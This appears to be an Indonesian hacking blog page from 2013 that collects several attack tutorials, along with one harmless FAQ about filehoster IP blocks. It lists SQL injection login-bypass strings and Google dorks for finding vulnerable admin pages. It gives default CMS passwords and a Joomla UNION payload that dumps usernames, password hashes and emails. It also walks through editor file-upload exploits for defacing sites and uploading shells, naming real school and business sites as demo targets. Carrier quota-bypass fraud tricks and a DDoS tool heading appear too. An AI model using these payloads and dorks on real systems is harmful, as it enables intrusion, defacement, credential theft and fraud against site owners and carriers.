Kamis, 18 April 2013

Upgrade Kecepatan Modem GSM !!


cara ini terbukti ampuh bgt di kompi ane..
trik ini ane lakukan kalo kuota uda habis, jadi kecepatan di turunkan  tapi tnang aja, dgn ada nya trik ini kecepatan inet kita dpat di upgarde lagi

langsung aja gan,,
* alat dan bahan :
- kartu GSM unlimited (kalo ane makai telkom*el)
- modem GSM
- mdma
download di sini
http://adf.ly/NBuXM
- ReConnect
download di sini
http://adf.ly/NBuaV

pastikan kamu punya sinyal edge atau 3G yg kuat..

* tutor :
1. buka madma.exe
2. setting connection type nya GPRS/EDGE only
4. buka ReConnect,, klik connect !
pastikan kalau settingan di modem dan di ReConnect sudah sesuai.
5. buka browser, tes speed nya di http://speedtest.indosatm2.com/ pastikan connection type nya masi GPRS/EDGE only
6. tunggu hingga di dapat ping dr koneksi kita
5. cepat - cepat buka lagi mdma.exe, lalu ubah connection type nya mnjadi 3G only
6. buka lagi browser, dan lihat speed nya

Sumber HN comunity

Rabu, 17 April 2013

Bypass Kuota Unlimited Flash Harian

1.Registrasi paket harian cara nya ketik UL (spasi) ON (spasi) 5K kirim ke 3636
2.tunggu hingga ada sms confirmasi pengaktifan.lalu reply ketik UL (spasi) YA kirim ke 3636
3.connect/dial modem ke internet
4.lakukan ping,dan cobalah browsing (jgn sampai melebihi 15MB)
5.lalu sms ketik UL (spasi) OFF kirim ke 3636 via modem (jgn disconnect)
6.tunggu hingga ada confirmasi pemberhentian paket,lalu reply ketik UL (spasi) YA kirim ke 3636
7.setelah mengikuti step diatas,cobalah download file lebih dari 15MB,
8.UNLIMITED NON KUOTA NON PENURUNAN SPEED
9.jika modem tidak dc selama 1 tahun,maka selama 1 tahun lah lo gratisan internetan

PERINGATAN: Setelah mengikuti step-step di atas,harap modem jgn disconect,karena sebelum nya trik
di atas adalah Unregistrasi paket yg di beli.
jadi setelah puas download,barulah DC hehehe 
sumber : cyberphreaker

Sql Injection Dasar

sql injection yang paling dasar Mendapatkan auth bypass di account admin.
Kebanyakan situs rentan terhadap ini.
- Pertama kita perlu menemukan situs
- mulailah dengan membuka google.

Dork :
"Inurl: admin.asp"
"Inurl: login / admin.asp"
"Inurl: admin / login.asp"
"Inurl: adminlogin.asp"
"Inurl: adminhome.asp"
"Inurl: admin_login.asp"
"Inurl: administratorlogin.asp"
"Inurl: login / administrator.asp"
"Inurl: administrator_login.asp"

ini adalah daftar sql injection

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

jadi nanti di isikan seperti ini, contoh :
username: Admin
password: 'or'1' = '1

Tidak semua site lemah pake ginian :)

Bug's Balitbang

dork in google..
1. inurl:"/html/index.php" intext:"Tim Balitbang"
2. inurl:"/html/index.php" intitle:"Selamat Datang"
3. inurl:"/member/" intext:"Tim Balitbang"

dork in bing..
1. IP:[target-IP] /html/
2. IP:[target-IP] sch.id
3. IP:[target-IP] ac.id
4. IP:[target-IP] blablablaa… having fun! 

login member using default user and password
alan 123456 guru aviable
kickdody 123456 guru aviable
070810120 123456 siswa not aviable
siswanto 123456 guru aviable
alumni 123456 guru not aviable
tomi 123456 guru aviable

login di 
http://localhost/member/

sumber mahruz-id

CMS Balitbang 3.42 [ DEFACE WEB BERDOMAIN SHC.ID ]


Dork :

inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Exploit : 
http://public_html/dir/editor/filemanager/connectors/uploadtest.html http://public_html/dir/editor/filemanager/connectors/test.html http://public_html/dir/editor/filemanager/browser/default/browser.html 

pilih salah satu, kalau sudah langsung masuk in exploitnya lalu pilih connector nya dari ASP --> PHP tinggal masukin filenya tapi berbentuk .TXT  

Demo:
http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.smppd1bpp.com/editor/filemanager/connectors/uploadtest.html
http://smp1kudus.sch.id/editor/filemanager/connectors/uploadtest.html

Hasil: 
http://www.sman1kotabaru.sch.id/userfiles/RSsite.txt
http://www.smppd1bpp.com/userfiles/RSsite.txt
http://smp1kudus.sch.id/userfiles/RSsite.txt 

Happy hacking :D

Joomla Exploit inurl:"com_ignitegallery" site:.ua

Dork : inurl:"com_ignitegallery" site:.ua


P.O.C : index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,0x3a,password,0x3a,email,0x3a,activation),4,5,6,7,8,9,10+from+jos_users--&Itemid=18

Monggo dicoba
cari login admin sendiri biar gak manja xD dan crack Password MD5 sendiri xD
Contoh : 
http://pvp.ho.ua/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,0x3a,password,0x3a,email,0x3a,activation),4,5,6,7,8,9,10+from+jos_users--&Itemid=18

Masalah Block IP


Akhir-akhir ini beberapa user filehoster seperti Uploaded, Filepost dll mengalami gangguan, yaitu tidak bisa login atau tidak bisa download dan keluar pesan IP Blocked. Apa yang terjadi, apa penyebabnya, dan bagaimana solusinya.
Apa yang terjadi?
IP Blocked terjadi kemungkinan karena :
  1. Cookies browser yang digunakan tidak aktif atau error sehingga browser tidak mengenali account premium Anda.
  2. IP koneksi yang Anda gunakan diblokir oleh Filehoster yang Anda miliki
Apa penyebabnya?
Kalau IP Blocked akibat cookies browser Anda error, itu karena error yang biasa dialami Sistem operasi atau browser.
Kalau IP Blocked akibat IP diblokir, itu akibat IP koneksi komputer Anda dianggap / dicurigai telah melakukan pelanggaran terhadap ketentuan Filehoster.
Hal ini umumnya dialami oleh pelanggan yang menggunakan koneksi dari ISP besar yang memberi kecepatan tinggi atau ISP yang menerapkan proxy. Berikut pertanyaan yang sering muncul dari pelanggan:
Saya merasa tidak melakukan pelanggaran, account dan komputer saya gunakan sendiri, kenapa IPnya diblokir?
Ya, mungkin bukan Anda pelakunya. Kalau koneksi anda termasuk IP dinamis (berubah-rubah kalau direstart modemnya) maka mungkin pengguna sebelum Anda yang melakukannya. Kalau koneksi Anda termasuk IP statis maka orang yang satu jaringan Anda yang melanggar
Bagaimana cara mengechek apakah koneksi saya IP Statis atau IP dinamis?
  1. Klik http://www.checkip.org/. Atau klik cara memeriksa IP
  2. Catat nomor IP yang tampil
  3. Restart atau putuskan koneksi modem Anda
  4. Sambungkan / connect / koneksikan lagi modem Anda
  5. Klik http://www.checkip.org/.
  6. Catat nomor IP yang tampil, bandingkan dengan nomor IP sebelum direstart/reconnect. Jika berubah maka koneksi Anda termasuk IP dinamis, jika masih sama berarti koneksi Anda termasuk IP statis atau ISPnya menerapkan proxy
 
Apa Solusinya?
Hal pertama  yang wajib dilakukan adalah membersihkan cookies browser terlebih dahulu. Dan pastikan bahwa cookies browser anda aktif, dan javasrciptnya tidak error. Cara mengaktifkan cookies dan javascript klik di sini
Jika IP Komputer Anda Dinamis,
cara-cara yang bisa dilakukan (lakukan secara berurutan, jika cara 1 tidak berhasil, lakukan cara  2, 3 dst):
Cara 1 : Putuskan koneksi modem lalu sambungkan kembali, login ke account premium Anda, jika masih IP Blocked, putus sambungkan lagi modemnya lalu login lagi,  terus lakukan hal seperti ini sampai mendapatkan IP yang tidak diblokir. Jika tidak berhasil lanjut ke cara 2
Cara 2 : Setting DNS Anda secara manual. Gunakan DNS standar Google. Caranya:
  • Klik Start > Setting Control Panel > Network Connection
  • Klik kanan di modem atau LAN atau koneksi yang Anda gunakan, lalu pilih Properties
  • Klik tab Networking > Internet Protocol (TCP/IP)
  • Klik Properties
  • Pilih Use the following DNS server Addresses
  • Di Prefered DNS server isikan: 8.8.4.4
  • Di Alternate DNS server isikan: 8.8.8.8
  • Klik tombol OK
Coba download. Jika masih IP Blocked, coba Cara 3
Cara 3 : Kunjungi / hubungi ISP (penyedia internet) Anda, minta IP yang tidak diblokir, atau minta disetting agar tidak diblokir. Jika ISP tidak memberikan solusi, gunakan Cara 4
Cara 4 : Mensetting proxy secara manual. Caranya lihat di halaman Cara merubah settingan proxy. Sebelum mensetting proxy secara manual, ada beberapa hal yang harus diperhatikan:
  • Kecepatan akan mengalami penurunan, karena Anda "numpang" di koneksi orang lain
  • Resiko penyadapan oleh si yang punya proxy, karena segala aktivitas online Anda akan melalui server mereka. Karena itu selama proxy disetting manual, jangan membuka data yang bersifat pribadi
  • Jangan merubah-rubah proxy yang lokasinya berjauhan, karena akan membuat Filehoster curiga bahwa account Anda digunakan hacker sehingga berakibat account diblokir
Jika cara ini tidak berhasil, lanjut ke cara 5
Cara 5 : Hubungi Customer Service Filehoster untuk meminta solusi.
Jika berbagai cara di atas tidak berhasil, maka tidak ada cara lain selain menunggu blokir IP dicabut atau selain GANTI KONEKSI / GANTI ISP .

Jika IP Komputer Anda Statis

Cara 1 : Setting DNS Anda secara manual. Gunakan DNS standar Google. Caranya:
  • Klik Start > Setting Control Panel > Network Connection
  • Klik kanan di modem atau LAN atau koneksi yang Anda gunakan, lalu pilih Properties
  • Klik tab Networking > Internet Protocol (TCP/IP)
  • Klik Properties
  • Pilih Use the following DNS server Addresses
  • Di Prefered DNS server isikan: 8.8.4.4
  • Di Alternate DNS server isikan: 8.8.8.8
  • Klik tombol OK
Coba download. Jika masih IP Blocked, coba Cara 2
Cara 2 : Kunjungi / hubungi ISP (penyedia internet) Anda, minta IP yang tidak diblokir, atau minta disetting agar tidak diblokir. Jika ISP tidak memberikan solusi, gunakan Cara 3
Cara 3 : Mensetting proxy secara manual. Caranya lihat di halaman Cara merubah settingan proxy. Sebelum mensetting proxy secara manual, ada beberapa hal yang harus diperhatikan:
  • Kecepatan akan mengalami penurunan, karena Anda "numpang" di koneksi orang lain
  • Resiko penyadapan oleh si yang punya proxy, karena segala aktivitas online Anda akan melalui server mereka. Karena itu selama proxy disetting manual, jangan membuka data yang bersifat pribadi
  • Jangan merubah-rubah proxy yang lokasinya berjauhan, karena akan membuat Filehoster curiga bahwa account Anda digunakan hacker sehingga berakibat account diblokir
Jika cara ini tidak berhasil, lanjut ke cara 4
Cara 4 : Hubungi Customer Service Filehoster untuk meminta solusi.
Jika berbagai cara di atas tidak berhasil, maka tidak ada cara lain selain menunggu blokir IP dicabut selain GANTI KONEKSI / GANTI ISP .

Kenapa hanya dari merk yang saya pake saja yang diblokir, kalau download pake account free atau download dari filehoster lain bisa?
Ya karena IP Anda dianggap melanggar oleh merk yang Anda pake itu, produk lain yang tidak ada kaitan dengan Filehoster Anda buat apa ikut-ikutan memblokir? Kalau pake Account Free jalan, itu karena Filehoster tidak perlu mengechek terlalu jauh terhadap pengguna free toh karena pengguna free sangat dibatasi penggunaanya. Sementara Account premium pemeriksaannya sangat ketat demi kepentingan pengguna premium sendiri.
 
Kesimpulan
Masalah IP Diblokir / IP Blocked BUKAN bukan terletak pada Account Anda! Melainkan pada koneksi yang Anda gunakan! Jadi jangan buru-buru protes accountnya tidak jalan! Cara mengatasinya mudah saja, yaitu dengan berusaha mendapatkan IP yang baru, baik dengan merestart modem (untuk tipe IP dinamis),  menggunakan proxy atau mengganti koneksi Anda dengan ISP yang IPnya tidak diblokir

PhUploader File Upload Vulnerable


==============
| Author : Zombierss  |
==============

Dork : inurl:"phUploader.php" intext:.txt
siapkan file .txt ( yang berisi tulisan "Hacked By Blablabla" )

Demo Vuln Upload :

Directory File :
http://localhost/[path]/upload/Name File.txt
http://localhost/[path]/uploads/[numbfile].txt

File Exploit Demo :

KindEdior Remote File Upload exploit


# Google Dork :
---------------
allinurl:/examples/uploadbutton.html
allinurl:/php/upload_json.php / .asp / .jsp
intitle:index of? inurl:kindeditor
inurl:examples/uploadbutton.html


1. Serch di Google terus pilih web yang vuln
3. http:// www.vulnrabewebsite.com/path/kindeditor/attached/file/[html kita].html pergi kesini
dan lihat hasil nya :)

Demo

DDOS .bat By Bonchu-k3c1L Demak Hacker Team

Deface Wordpress Dengan FCKeditor


Langkah 1: Buka google.com dan masukan Dork:


inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
atau
inurl:Powered By OpenCart



Pilihlah mana website yang diingini..

Contoh:



Langkah 2: Pasang exploit nya:

admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

Contoh:


Akan kelihatan seperti dibawah:





Jika website tersebut ada patch, tambahkan exploitnya selepas patch

 Contoh:

www.site.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


Langkah 3: Ganti “Connector” menjadi “PHP




Langkah 4: Upload Shell Atau Html Deface Agan2 :D


Langkah 5: Untuk check shell atau deface korang, check URL seperti ini:

atau





Demo untuk latihan:

http://wenrestaurant com/
http://wenrestaurant com/

Trims buat 207cyber